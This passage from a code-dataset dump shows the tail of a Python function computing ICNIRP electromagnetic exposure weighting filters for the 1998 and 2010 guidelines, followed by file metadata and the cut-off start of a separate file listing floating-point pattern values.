                    weight_fun[f < 1] = 1 / (40 * 1e-3 * np.sqrt(2))
                    weight_fun[(f >= 1) & (f < 4)] = 1 / (40 * 1e-3 / f[(f >= 1) & (f < 4)] * np.sqrt(2))
                    weight_fun[(f >= 4) & (f < 1000)] = 1 / (10 * 1e-3 * np.sqrt(2))
                    weight_fun[(f >= 1000) & (f < 100e3)] = 1 / (f[(f >= 1000) & (f < 100e3)] / 100 * 1e-3 * np.sqrt(2))
                    weight_fun[(f >= 100e3) & (f < 10e6)] = 1 / (f[(f >= 100e3) & (f < 10e6)] / 100 * 1e-3 * np.sqrt(2))
                    phase[f > 1000] = -90 * isgn[f > 1000]
                elif domain == 'time':
                    if rc_series == 'y':
                        # corners at 1 Hz, 4 Hz and 1 kHz
                        a = 2 * np.pi * 1
                        b = 2 * np.pi * 4
                        c = 2 * np.pi * 1000
                        fref = np.array([1e5])
                        s = 2j * np.pi * fref
                        Href = (s + a) / ((s + b) * (s + c))
                        lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
                        k = (1.0 / (lim_ref * np.abs(Href))).item()
                        # H(s) = k*(s+a) / ((s+b)(s+c))
                        num = np.array([k, (k * a)])
                        den = np.array([1, (b + c), (b * c)])
                    else:
                        # single pole at 1 kHz
                        a = 2 * np.pi * 1000
                        fref = np.array([1e5])
                        s = 2j * np.pi * fref
                        Href = 1 / (s + a)
                        lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
                        k = (1.0 / (lim_ref * np.abs(Href))).item()
                        num = np.array([k])
                        den = np.array([1, a])
        elif receptor == 'public':
            if quantity == 'B':
                if domain == 'freq':
                    isgn = np.sign(f)
                    f = np.abs(f)
                    # public reference level flattens at 800 Hz (not 820)
                    weight_fun = np.zeros(f.shape)
                    phase = np.zeros(f.shape)
                    weight_fun[f < 1] = 1 / (4e-2 * np.sqrt(2))
                    weight_fun[(f >= 1) & (f < 8)] = 1 / (4e-2 / f[(f >= 1) & (f < 8)] ** 2 * np.sqrt(2))
                    weight_fun[(f >= 8) & (f < 25)] = 1 / (5e-3 / f[(f >= 8) & (f < 25)] * np.sqrt(2))
                    weight_fun[(f >= 25) & (f < 800)] = 1 / (5e-6 / (f[(f >= 25) & (f < 800)] * 1e-3) * np.sqrt(2))
                    weight_fun[f >= 800] = 1 / (6.25e-6 * np.sqrt(2))
                    phase[f < 800] = 90 * isgn[f < 800]
                elif domain == 'time':
                    if rc_series == 'y':
                        # corners at 8 Hz and 800 Hz
                        a = 2 * np.pi * 8
                        b = 2 * np.pi * 800
                        fref = np.array([1e4])
                        s = 2j * np.pi * fref
                        Href = (s ** 2) / ((s + a) * (s + b))
                        lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
                        k = (1.0 / (lim_ref * np.abs(Href))).item()
                        num = np.array([k, 0, 0])
                        den = np.array([1, (a + b), (a * b)])
                    else:
                        # BUGFIX: corner was 820 Hz (copied from the
                        # occupational branch); the public 1998 'B' breakpoint
                        # is 800 Hz, matching the freq-domain weight above and
                        # icnirp_limit.
                        a = 2 * np.pi * 800
                        fref = np.array([1e4])
                        s = 2j * np.pi * fref
                        Href = s / (s + a)
                        lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
                        k = (1.0 / (lim_ref * np.abs(Href))).item()
                        num = np.array([k, 0])
                        den = np.array([1, a])
            elif quantity == 'J':
                if domain == 'freq':
                    isgn = np.sign(f)
                    f = np.abs(f)
                    weight_fun = np.zeros(f.shape)
                    phase = np.zeros(f.shape)
                    weight_fun[f < 1] = 1 / (8 * 1e-3 * np.sqrt(2))
                    weight_fun[(f >= 1) & (f < 4)] = 1 / (8 * 1e-3 / f[(f >= 1) & (f < 4)] * np.sqrt(2))
                    weight_fun[(f >= 4) & (f < 1000)] = 1 / (2 * 1e-3 * np.sqrt(2))
                    weight_fun[(f >= 1000) & (f < 100e3)] = 1 / (f[(f >= 1000) & (f < 100e3)] / 500 * 1e-3 * np.sqrt(2))
                    weight_fun[(f >= 100e3) & (f < 10e6)] = 1 / (f[(f >= 100e3) & (f < 10e6)] / 500 * 1e-3 * np.sqrt(2))
                    phase[f > 1000] = -90 * isgn[f > 1000]
                elif domain == 'time':
                    if rc_series == 'y':
                        # corners at 1 Hz, 4 Hz and 1 kHz
                        a = 2 * np.pi * 1
                        b = 2 * np.pi * 4
                        c = 2 * np.pi * 1000
                        fref = np.array([1e5])
                        s = 2j * np.pi * fref
                        Href = (s + a) / ((s + b) * (s + c))
                        lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
                        k = (1.0 / (lim_ref * np.abs(Href))).item()
                        num = np.array([k, (k * a)])
                        den = np.array([1, (b + c), (b * c)])
                    else:
                        # single pole at 1 kHz
                        a = 2 * np.pi * 1000
                        fref = np.array([1e5])
                        s = 2j * np.pi * fref
                        Href = 1 / (s + a)
                        lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
                        k = (1.0 / (lim_ref * np.abs(Href))).item()
                        num = np.array([k])
                        den = np.array([1, a])
    elif year == '2010':
        if receptor == 'occupational':
            if quantity == 'B':
                if domain == 'freq':
                    isgn = np.sign(f)
                    f = np.abs(f)
                    weight_fun = np.zeros(f.shape)
                    phase = np.zeros(f.shape)
                    weight_fun[(f >= 1) & (f < 8)] = 1 / (0.2 / f[(f >= 1) & (f < 8)] ** 2 * np.sqrt(2))
                    weight_fun[(f >= 8) & (f < 25)] = 1 / (2.5e-2 / f[(f >= 8) & (f < 25)] * np.sqrt(2))
                    weight_fun[(f >= 25) & (f < 300)] = 1 / (1e-3 * np.sqrt(2))
                    weight_fun[(f >= 300) & (f < 3000)] = 1 / (0.3 / f[(f >= 300) & (f < 3000)] * np.sqrt(2))
                    weight_fun[(f >= 3000) & (f < 10e6)] = 1 / (1e-4 * np.sqrt(2))
                    phase[(f >= 1) & (f < 8)] = isgn[(f >= 1) & (f < 8)] * 180
                    phase[(f >= 8) & (f < 25)] = isgn[(f >= 8) & (f < 25)] * 90
                    phase[(f >= 25) & (f < 300)] = 0
                    phase[(f >= 300) & (f < 3000)] = isgn[(f >= 300) & (f < 3000)] * 90
                    phase[(f >= 3000) & (f < 10e6)] = 0
                elif domain == 'time':
                    # corners at 8, 25, 300 and 3000 Hz
                    a = 2 * np.pi * 8
                    b = 2 * np.pi * 25
                    c = 2 * np.pi * 300
                    d = 2 * np.pi * 3000
                    fref = np.array([1])
                    s = 2j * np.pi * fref
                    Href = (s ** 2. * (s + c)) / ((s + a) * (s + b) * (s + d))
                    lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
                    k = (1.0 / (lim_ref * np.abs(Href))).item()
                    # H(s) = k*s^2*(s+c) / ((s+a)(s+b)(s+d))
                    num = np.array([k, k * c, 0, 0])
                    den = np.array([1, (a + b + d), (a * b + a * d + b * d), (a * b * d)])
            elif quantity == 'Ecns':
                if domain == 'freq':
                    isgn = np.sign(f)
                    f = np.abs(f)
                    weight_fun = np.zeros(f.shape)
                    phase = np.zeros(f.shape)
                    weight_fun[(f >= 1) & (f < 10)] = 1 / (0.5 / f[(f >= 1) & (f < 10)] * np.sqrt(2))
                    weight_fun[(f >= 10) & (f < 25)] = 1 / (0.05 * np.sqrt(2))
                    weight_fun[(f >= 25) & (f < 400)] = 1 / (2e-3 * f[(f >= 25) & (f < 400)] * np.sqrt(2))
                    weight_fun[(f >= 400) & (f < 3000)] = 1 / (0.8 * np.sqrt(2))
                    weight_fun[(f >= 3000) & (f < 10e6)] = 1 / (2.7e-4 * f[(f >= 3000) & (f < 10e6)] * np.sqrt(2))
                    phase[(f >= 1) & (f < 10)] = 90 * isgn[(f >= 1) & (f < 10)]
                    phase[(f >= 10) & (f < 25)] = 0
                    phase[(f >= 25) & (f < 1000)] = -90 * isgn[(f >= 25) & (f < 1000)]
                    phase[(f >= 1000) & (f < 3000)] = 0
                    phase[(f >= 3000) & (f < 10e6)] = -90 * isgn[(f >= 3000) & (f < 10e6)]
                elif domain == 'time':
                    # corners at 10, 25, 400 and 3000 Hz
                    a = 2 * np.pi * 10
                    b = 2 * np.pi * 25
                    c = 2 * np.pi * 400
                    d = 2 * np.pi * 3000
                    fref = np.array([30e3])
                    s = 2j * np.pi * fref
                    Href = (s * (s + c)) / ((s + a) * (s + b) * (s + d))
                    lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
                    k = (1.0 / (lim_ref * np.abs(Href))).item()
                    # ndarray for consistency with the other branches
                    # (was a plain list)
                    num = np.array([k, k * c, 0])
                    den = np.array([1, (a + b + d), (a * b + a * d + b * d), a * b * d])
            elif quantity == 'Epns':
                if domain == 'freq':
                    isgn = np.sign(f)
                    f = np.abs(f)
                    weight_fun = np.zeros(f.shape)
                    phase = np.zeros(f.shape)
                    weight_fun[(f >= 1) & (f < 3000)] = 1 / (0.8 * np.sqrt(2))
                    weight_fun[(f >= 3000) & (f < 10e6)] = 1 / (2.7e-4 * f[(f >= 3000) & (f < 10e6)] * np.sqrt(2))
                    phase[(f >= 1) & (f < 3000)] = 0
                    phase[(f >= 3000) & (f < 10e6)] = -90 * isgn[(f >= 3000) & (f < 10e6)]
                elif domain == 'time':
                    # single pole at 3 kHz
                    a = 2 * np.pi * 3000
                    fref = np.array([1])
                    s = 2j * np.pi * fref
                    Href = 1 / (s + a)
                    lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
                    k = (1.0 / (lim_ref * np.abs(Href))).item()
                    # ndarray for consistency (was a plain list)
                    num = np.array([k])
                    den = np.array([1, a])
        elif receptor == 'public':
            if quantity == 'B':
                if domain == 'freq':
                    isgn = np.sign(f)
                    f = np.abs(f)
                    weight_fun = np.zeros(f.shape)
                    phase = np.zeros(f.shape)
                    weight_fun[(f >= 1) & (f < 8)] = 1 / (4e-2 / f[(f >= 1) & (f < 8)] ** 2 * np.sqrt(2))
                    weight_fun[(f >= 8) & (f < 25)] = 1 / (5e-3 / f[(f >= 8) & (f < 25)] * np.sqrt(2))
                    weight_fun[(f >= 25) & (f < 50)] = 1 / (2e-4 * np.sqrt(2))
                    weight_fun[(f >= 50) & (f < 400)] = 1 / (2e-4 * np.sqrt(2))
                    weight_fun[(f >= 400) & (f < 3000)] = 1 / (8e-2 / f[(f >= 400) & (f < 3000)] * np.sqrt(2))
                    weight_fun[(f >= 3000) & (f < 10e6)] = 1 / (2.7e-5 * np.sqrt(2))
                    phase[(f >= 1) & (f < 8)] = 180 * isgn[(f >= 1) & (f < 8)]
                    phase[(f >= 8) & (f < 25)] = 90 * isgn[(f >= 8) & (f < 25)]
                    phase[(f >= 25) & (f < 50)] = 0
                    phase[(f >= 50) & (f < 400)] = 0
                    phase[(f >= 400) & (f < 3000)] = 90 * isgn[(f >= 400) & (f < 3000)]
                    phase[(f >= 3000) & (f < 10e6)] = 0
                elif domain == 'time':
                    # corners at 8, 25, 400 and 3000 Hz
                    a = 2 * np.pi * 8
                    b = 2 * np.pi * 25
                    c = 2 * np.pi * 400
                    d = 2 * np.pi * 3000
                    fref = np.array([1])
                    s = 2j * np.pi * fref
                    Href = (s ** 2. * (s + c)) / ((s + a) * (s + b) * (s + d))
                    lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
                    k = (1.0 / (lim_ref * np.abs(Href))).item()
                    num = np.array([k, k * c, 0, 0])
                    den = np.array([1, (a + b + d), (a * b + a * d + b * d), (a * b * d)])
            elif quantity == 'Ecns':
                if domain == 'freq':
                    isgn = np.sign(f)
                    f = np.abs(f)
                    weight_fun = np.zeros(f.shape)
                    phase = np.zeros(f.shape)
                    weight_fun[(f >= 1) & (f < 10)] = 1 / (0.1 / f[(f >= 1) & (f < 10)] * np.sqrt(2))
                    weight_fun[(f >= 10) & (f < 25)] = 1 / (0.01 * np.sqrt(2))
                    weight_fun[(f >= 25) & (f < 1000)] = 1 / (4e-4 * f[(f >= 25) & (f < 1000)] * np.sqrt(2))
                    weight_fun[(f >= 1000) & (f < 3000)] = 1 / (0.4 * np.sqrt(2))
                    weight_fun[(f >= 3000) & (f < 10e6)] = 1 / (1.35e-4 * f[(f >= 3000) & (f < 10e6)] * np.sqrt(2))
                    phase[(f >= 1) & (f < 10)] = 90 * isgn[(f >= 1) & (f < 10)]
                    phase[(f >= 10) & (f < 25)] = 0
                    phase[(f >= 25) & (f < 1000)] = -90 * isgn[(f >= 25) & (f < 1000)]
                    phase[(f >= 1000) & (f < 3000)] = 0
                    phase[(f >= 3000) & (f < 10e6)] = -90 * isgn[(f >= 3000) & (f < 10e6)]
                elif domain == 'time':
                    # corners at 10, 25, 1000 and 3000 Hz
                    a = 2 * np.pi * 10
                    b = 2 * np.pi * 25
                    c = 2 * np.pi * 1000
                    d = 2 * np.pi * 3000
                    fref = np.array([30e3])
                    s = 2j * np.pi * fref
                    Href = (s * (s + c)) / ((s + a) * (s + b) * (s + d))
                    lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
                    k = (1.0 / (lim_ref * np.abs(Href))).item()
                    # ndarray for consistency (was a plain list)
                    num = np.array([k, k * c, 0])
                    den = np.array([1, (a + b + d), (a * b + a * d + b * d), a * b * d])
            elif quantity == 'Epns':
                if domain == 'freq':
                    isgn = np.sign(f)
                    f = np.abs(f)
                    weight_fun = np.zeros(f.shape)
                    phase = np.zeros(f.shape)
                    weight_fun[(f >= 1) & (f < 3000)] = 1 / (0.4 * np.sqrt(2))
                    weight_fun[(f >= 3000) & (f < 10e6)] = 1 / (1.35e-4 * f[(f >= 3000) & (f < 10e6)] * np.sqrt(2))
                    phase[(f >= 1) & (f < 3000)] = 0
                    phase[(f >= 3000) & (f < 10e6)] = -90 * isgn[(f >= 3000) & (f < 10e6)]
                elif domain == 'time':
                    # single pole at 3 kHz
                    a = 2 * np.pi * 3000
                    fref = np.array([1])
                    s = 2j * np.pi * fref
                    Href = 1 / (s + a)
                    lim_ref = icnirp_limit(fref, year, receptor, quantity) * np.sqrt(2)
                    k = (1.0 / (lim_ref * np.abs(Href))).item()
                    # ndarray for consistency (was a plain list)
                    num = np.array([k])
                    den = np.array([1, a])
    # Assign outputs
    if domain == 'time':
        return num, den
    elif domain == 'freq':
        return weight_fun, phase
| 43.991468
| 120
| 0.351216
| 3,129
| 25,779
| 2.85938
| 0.060083
| 0.015201
| 0.046161
| 0.050855
| 0.844864
| 0.829552
| 0.824969
| 0.797474
| 0.776126
| 0.722477
| 0
| 0.129768
| 0.474184
| 25,779
| 585
| 121
| 44.066667
| 0.530284
| 0.096745
| 0
| 0.710456
| 0
| 0
| 0.009732
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.005362
| false
| 0
| 0.002681
| 0
| 0.016086
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
90b5cbf792bb5859b335491eb572f9b220402f95
| 93,307
|
py
|
Python
|
mysite/patterns/64.py
|
BioinfoNet/prepub
|
e19c48cabf8bd22736dcef9308a5e196cfd8119a
|
[
"MIT"
] | 19
|
2016-06-17T23:36:27.000Z
|
2020-01-13T16:41:55.000Z
|
mysite/patterns/64.py
|
BioinfoNet/prepub
|
e19c48cabf8bd22736dcef9308a5e196cfd8119a
|
[
"MIT"
] | 13
|
2016-06-06T12:57:05.000Z
|
2019-02-05T02:21:00.000Z
|
patterns/64.py
|
OmnesRes/GRIMMER
|
173c99ebdb6a9edb1242d24a791d0c5d778ff643
|
[
"MIT"
] | 7
|
2017-03-28T18:12:22.000Z
|
2021-06-16T09:32:59.000Z
|
pattern_zero=[0.0, 0.015380859375, 0.0302734375, 0.03125, 0.044677734375, 0.046630859375, 0.05859375, 0.0615234375, 0.0625, 0.072021484375, 0.075927734375, 0.077880859375, 0.0849609375, 0.08984375, 0.0927734375, 0.09375, 0.097412109375, 0.103271484375, 0.107177734375, 0.109130859375, 0.109375, 0.1162109375, 0.120849609375, 0.12109375, 0.1240234375, 0.125, 0.128662109375, 0.1318359375, 0.134521484375, 0.138427734375, 0.140380859375, 0.140625, 0.142333984375, 0.1474609375, 0.152099609375, 0.15234375, 0.1552734375, 0.15625, 0.159912109375, 0.161865234375, 0.1630859375, 0.165771484375, 0.169677734375, 0.1708984375, 0.171630859375, 0.171875, 0.173583984375, 0.1787109375, 0.179443359375, 0.183349609375, 0.18359375, 0.1865234375, 0.1875, 0.191162109375, 0.193115234375, 0.1943359375, 0.195068359375, 0.197021484375, 0.200927734375, 0.2021484375, 0.202880859375, 0.203125, 0.204833984375, 0.208740234375, 0.2099609375, 0.210693359375, 0.214599609375, 0.21484375, 0.2177734375, 0.21875, 0.220458984375, 0.222412109375, 0.224365234375, 0.2255859375, 0.226318359375, 0.228271484375, 0.230224609375, 0.232177734375, 0.2333984375, 0.234130859375, 0.234375, 0.236083984375, 0.238037109375, 0.239990234375, 0.2412109375, 0.241943359375, 0.243896484375, 0.245849609375, 0.24609375, 0.247802734375, 0.2490234375, 0.249755859375, 0.25, 0.251708984375, 0.253662109375, 0.255615234375, 0.2568359375, 0.257568359375, 0.259521484375, 0.261474609375, 0.263427734375, 0.2646484375, 0.265380859375, 0.265625, 0.267333984375, 0.269287109375, 0.271240234375, 0.2724609375, 0.273193359375, 0.275146484375, 0.277099609375, 0.27734375, 0.279052734375, 0.2802734375, 0.281005859375, 0.28125, 0.282958984375, 0.284912109375, 0.286865234375, 0.2880859375, 0.288818359375, 0.290771484375, 0.292724609375, 0.294677734375, 0.2958984375, 0.296630859375, 0.296875, 0.298583984375, 0.300537109375, 0.302490234375, 0.3037109375, 0.304443359375, 0.306396484375, 0.308349609375, 0.30859375, 0.310302734375, 0.3115234375, 
0.312255859375, 0.3125, 0.314208984375, 0.316162109375, 0.318115234375, 0.3193359375, 0.320068359375, 0.322021484375, 0.323974609375, 0.325927734375, 0.3271484375, 0.327880859375, 0.328125, 0.329833984375, 0.331787109375, 0.333740234375, 0.3349609375, 0.335693359375, 0.337646484375, 0.339599609375, 0.33984375, 0.341552734375, 0.3427734375, 0.343505859375, 0.34375, 0.345458984375, 0.347412109375, 0.349365234375, 0.3505859375, 0.351318359375, 0.353271484375, 0.355224609375, 0.357177734375, 0.3583984375, 0.359130859375, 0.359375, 0.361083984375, 0.363037109375, 0.364990234375, 0.3662109375, 0.366943359375, 0.368896484375, 0.370849609375, 0.37109375, 0.372802734375, 0.3740234375, 0.374755859375, 0.375, 0.376708984375, 0.378662109375, 0.380615234375, 0.3818359375, 0.382568359375, 0.384521484375, 0.386474609375, 0.388427734375, 0.3896484375, 0.390380859375, 0.390625, 0.392333984375, 0.394287109375, 0.396240234375, 0.3974609375, 0.398193359375, 0.400146484375, 0.402099609375, 0.40234375, 0.404052734375, 0.4052734375, 0.406005859375, 0.40625, 0.407958984375, 0.409912109375, 0.411865234375, 0.4130859375, 0.413818359375, 0.415771484375, 0.417724609375, 0.419677734375, 0.4208984375, 0.421630859375, 0.421875, 0.423583984375, 0.425537109375, 0.427490234375, 0.4287109375, 0.429443359375, 0.431396484375, 0.433349609375, 0.43359375, 0.435302734375, 0.4365234375, 0.437255859375, 0.4375, 0.439208984375, 0.441162109375, 0.443115234375, 0.4443359375, 0.445068359375, 0.447021484375, 0.448974609375, 0.450927734375, 0.4521484375, 0.452880859375, 0.453125, 0.454833984375, 0.456787109375, 0.458740234375, 0.4599609375, 0.460693359375, 0.462646484375, 0.464599609375, 0.46484375, 0.466552734375, 0.4677734375, 0.468505859375, 0.46875, 0.470458984375, 0.472412109375, 0.474365234375, 0.4755859375, 0.476318359375, 0.478271484375, 0.480224609375, 0.482177734375, 0.4833984375, 0.484130859375, 0.484375, 0.486083984375, 0.488037109375, 0.489990234375, 0.4912109375, 0.491943359375, 0.493896484375, 
0.495849609375, 0.49609375, 0.497802734375, 0.4990234375, 0.499755859375, 0.5, 0.501708984375, 0.503662109375, 0.505615234375, 0.5068359375, 0.507568359375, 0.509521484375, 0.511474609375, 0.513427734375, 0.5146484375, 0.515380859375, 0.515625, 0.517333984375, 0.519287109375, 0.521240234375, 0.5224609375, 0.523193359375, 0.525146484375, 0.527099609375, 0.52734375, 0.529052734375, 0.5302734375, 0.531005859375, 0.53125, 0.532958984375, 0.534912109375, 0.536865234375, 0.5380859375, 0.538818359375, 0.540771484375, 0.542724609375, 0.544677734375, 0.5458984375, 0.546630859375, 0.546875, 0.548583984375, 0.550537109375, 0.552490234375, 0.5537109375, 0.554443359375, 0.556396484375, 0.558349609375, 0.55859375, 0.560302734375, 0.5615234375, 0.562255859375, 0.5625, 0.564208984375, 0.566162109375, 0.568115234375, 0.5693359375, 0.570068359375, 0.572021484375, 0.573974609375, 0.575927734375, 0.5771484375, 0.577880859375, 0.578125, 0.579833984375, 0.581787109375, 0.583740234375, 0.5849609375, 0.585693359375, 0.587646484375, 0.589599609375, 0.58984375, 0.591552734375, 0.5927734375, 0.593505859375, 0.59375, 0.595458984375, 0.597412109375, 0.599365234375, 0.6005859375, 0.601318359375, 0.603271484375, 0.605224609375, 0.607177734375, 0.6083984375, 0.609130859375, 0.609375, 0.611083984375, 0.613037109375, 0.614990234375, 0.6162109375, 0.616943359375, 0.618896484375, 0.620849609375, 0.62109375, 0.622802734375, 0.6240234375, 0.624755859375, 0.625, 0.626708984375, 0.628662109375, 0.630615234375, 0.6318359375, 0.632568359375, 0.634521484375, 0.636474609375, 0.638427734375, 0.6396484375, 0.640380859375, 0.640625, 0.642333984375, 0.644287109375, 0.646240234375, 0.6474609375, 0.648193359375, 0.650146484375, 0.652099609375, 0.65234375, 0.654052734375, 0.6552734375, 0.656005859375, 0.65625, 0.657958984375, 0.659912109375, 0.661865234375, 0.6630859375, 0.663818359375, 0.665771484375, 0.667724609375, 0.669677734375, 0.6708984375, 0.671630859375, 0.671875, 0.673583984375, 0.675537109375, 
0.677490234375, 0.6787109375, 0.679443359375, 0.681396484375, 0.683349609375, 0.68359375, 0.685302734375, 0.6865234375, 0.687255859375, 0.6875, 0.689208984375, 0.691162109375, 0.693115234375, 0.6943359375, 0.695068359375, 0.697021484375, 0.698974609375, 0.700927734375, 0.7021484375, 0.702880859375, 0.703125, 0.704833984375, 0.706787109375, 0.708740234375, 0.7099609375, 0.710693359375, 0.712646484375, 0.714599609375, 0.71484375, 0.716552734375, 0.7177734375, 0.718505859375, 0.71875, 0.720458984375, 0.722412109375, 0.724365234375, 0.7255859375, 0.726318359375, 0.728271484375, 0.730224609375, 0.732177734375, 0.7333984375, 0.734130859375, 0.734375, 0.736083984375, 0.738037109375, 0.739990234375, 0.7412109375, 0.741943359375, 0.743896484375, 0.745849609375, 0.74609375, 0.747802734375, 0.7490234375, 0.749755859375, 0.75, 0.751708984375, 0.753662109375, 0.755615234375, 0.7568359375, 0.757568359375, 0.759521484375, 0.761474609375, 0.763427734375, 0.7646484375, 0.765380859375, 0.765625, 0.767333984375, 0.769287109375, 0.771240234375, 0.7724609375, 0.773193359375, 0.775146484375, 0.777099609375, 0.77734375, 0.779052734375, 0.7802734375, 0.781005859375, 0.78125, 0.782958984375, 0.784912109375, 0.786865234375, 0.7880859375, 0.788818359375, 0.790771484375, 0.792724609375, 0.794677734375, 0.7958984375, 0.796630859375, 0.796875, 0.798583984375, 0.800537109375, 0.802490234375, 0.8037109375, 0.804443359375, 0.806396484375, 0.808349609375, 0.80859375, 0.810302734375, 0.8115234375, 0.812255859375, 0.8125, 0.814208984375, 0.816162109375, 0.818115234375, 0.8193359375, 0.820068359375, 0.822021484375, 0.823974609375, 0.825927734375, 0.8271484375, 0.827880859375, 0.828125, 0.829833984375, 0.831787109375, 0.833740234375, 0.8349609375, 0.835693359375, 0.837646484375, 0.839599609375, 0.83984375, 0.841552734375, 0.8427734375, 0.843505859375, 0.84375, 0.845458984375, 0.847412109375, 0.849365234375, 0.8505859375, 0.851318359375, 0.853271484375, 0.855224609375, 0.857177734375, 0.8583984375, 
0.859130859375, 0.859375, 0.861083984375, 0.863037109375, 0.864990234375, 0.8662109375, 0.866943359375, 0.868896484375, 0.870849609375, 0.87109375, 0.872802734375, 0.8740234375, 0.874755859375, 0.875, 0.876708984375, 0.878662109375, 0.880615234375, 0.8818359375, 0.882568359375, 0.884521484375, 0.886474609375, 0.888427734375, 0.8896484375, 0.890380859375, 0.890625, 0.892333984375, 0.894287109375, 0.896240234375, 0.8974609375, 0.898193359375, 0.900146484375, 0.902099609375, 0.90234375, 0.904052734375, 0.9052734375, 0.906005859375, 0.90625, 0.907958984375, 0.909912109375, 0.911865234375, 0.9130859375, 0.913818359375, 0.915771484375, 0.917724609375, 0.919677734375, 0.9208984375, 0.921630859375, 0.921875, 0.923583984375, 0.925537109375, 0.927490234375, 0.9287109375, 0.929443359375, 0.931396484375, 0.933349609375, 0.93359375, 0.935302734375, 0.9365234375, 0.937255859375, 0.9375, 0.939208984375, 0.941162109375, 0.943115234375, 0.9443359375, 0.945068359375, 0.947021484375, 0.948974609375, 0.950927734375, 0.9521484375, 0.952880859375, 0.953125, 0.954833984375, 0.956787109375, 0.958740234375, 0.9599609375, 0.960693359375, 0.962646484375, 0.964599609375, 0.96484375, 0.966552734375, 0.9677734375, 0.968505859375, 0.96875, 0.970458984375, 0.972412109375, 0.974365234375, 0.9755859375, 0.976318359375, 0.978271484375, 0.980224609375, 0.982177734375, 0.9833984375, 0.984130859375, 0.984375, 0.986083984375, 0.988037109375, 0.989990234375, 0.9912109375, 0.991943359375, 0.993896484375, 0.995849609375, 0.99609375, 0.997802734375, 0.9990234375, 0.999755859375]
pattern_odd=[0.0, 0.001708984375, 0.003662109375, 0.005615234375, 0.0068359375, 0.007568359375, 0.009521484375, 0.011474609375, 0.013427734375, 0.0146484375, 0.015380859375, 0.015625, 0.017333984375, 0.019287109375, 0.021240234375, 0.0224609375, 0.023193359375, 0.025146484375, 0.027099609375, 0.02734375, 0.029052734375, 0.0302734375, 0.031005859375, 0.03125, 0.032958984375, 0.034912109375, 0.036865234375, 0.0380859375, 0.038818359375, 0.040771484375, 0.042724609375, 0.044677734375, 0.0458984375, 0.046630859375, 0.046875, 0.048583984375, 0.050537109375, 0.052490234375, 0.0537109375, 0.054443359375, 0.056396484375, 0.058349609375, 0.05859375, 0.060302734375, 0.0615234375, 0.062255859375, 0.0625, 0.064208984375, 0.066162109375, 0.068115234375, 0.0693359375, 0.070068359375, 0.072021484375, 0.073974609375, 0.075927734375, 0.0771484375, 0.077880859375, 0.078125, 0.079833984375, 0.081787109375, 0.083740234375, 0.0849609375, 0.085693359375, 0.087646484375, 0.089599609375, 0.08984375, 0.091552734375, 0.0927734375, 0.093505859375, 0.09375, 0.095458984375, 0.097412109375, 0.099365234375, 0.1005859375, 0.101318359375, 0.103271484375, 0.105224609375, 0.107177734375, 0.1083984375, 0.109130859375, 0.109375, 0.111083984375, 0.113037109375, 0.114990234375, 0.1162109375, 0.116943359375, 0.118896484375, 0.120849609375, 0.12109375, 0.122802734375, 0.1240234375, 0.124755859375, 0.125, 0.126708984375, 0.128662109375, 0.130615234375, 0.1318359375, 0.132568359375, 0.134521484375, 0.136474609375, 0.138427734375, 0.1396484375, 0.140380859375, 0.140625, 0.142333984375, 0.144287109375, 0.146240234375, 0.1474609375, 0.148193359375, 0.150146484375, 0.152099609375, 0.15234375, 0.154052734375, 0.1552734375, 0.156005859375, 0.15625, 0.157958984375, 0.159912109375, 0.161865234375, 0.1630859375, 0.163818359375, 0.165771484375, 0.167724609375, 0.169677734375, 0.1708984375, 0.171630859375, 0.171875, 0.173583984375, 0.175537109375, 0.177490234375, 0.1787109375, 0.179443359375, 0.181396484375, 
0.183349609375, 0.18359375, 0.185302734375, 0.1865234375, 0.187255859375, 0.1875, 0.189208984375, 0.191162109375, 0.193115234375, 0.1943359375, 0.195068359375, 0.197021484375, 0.198974609375, 0.200927734375, 0.2021484375, 0.202880859375, 0.203125, 0.204833984375, 0.206787109375, 0.208740234375, 0.2099609375, 0.210693359375, 0.212646484375, 0.214599609375, 0.21484375, 0.216552734375, 0.2177734375, 0.218505859375, 0.21875, 0.220458984375, 0.222412109375, 0.224365234375, 0.2255859375, 0.226318359375, 0.228271484375, 0.230224609375, 0.232177734375, 0.2333984375, 0.234130859375, 0.234375, 0.236083984375, 0.238037109375, 0.239990234375, 0.2412109375, 0.241943359375, 0.243896484375, 0.245849609375, 0.24609375, 0.247802734375, 0.2490234375, 0.249755859375, 0.25, 0.251708984375, 0.253662109375, 0.255615234375, 0.2568359375, 0.257568359375, 0.259521484375, 0.261474609375, 0.263427734375, 0.2646484375, 0.265380859375, 0.265625, 0.267333984375, 0.269287109375, 0.271240234375, 0.2724609375, 0.273193359375, 0.275146484375, 0.277099609375, 0.27734375, 0.279052734375, 0.2802734375, 0.281005859375, 0.28125, 0.282958984375, 0.284912109375, 0.286865234375, 0.2880859375, 0.288818359375, 0.290771484375, 0.292724609375, 0.294677734375, 0.2958984375, 0.296630859375, 0.296875, 0.298583984375, 0.300537109375, 0.302490234375, 0.3037109375, 0.304443359375, 0.306396484375, 0.308349609375, 0.30859375, 0.310302734375, 0.3115234375, 0.312255859375, 0.3125, 0.314208984375, 0.316162109375, 0.318115234375, 0.3193359375, 0.320068359375, 0.322021484375, 0.323974609375, 0.325927734375, 0.3271484375, 0.327880859375, 0.328125, 0.329833984375, 0.331787109375, 0.333740234375, 0.3349609375, 0.335693359375, 0.337646484375, 0.339599609375, 0.33984375, 0.341552734375, 0.3427734375, 0.343505859375, 0.34375, 0.345458984375, 0.347412109375, 0.349365234375, 0.3505859375, 0.351318359375, 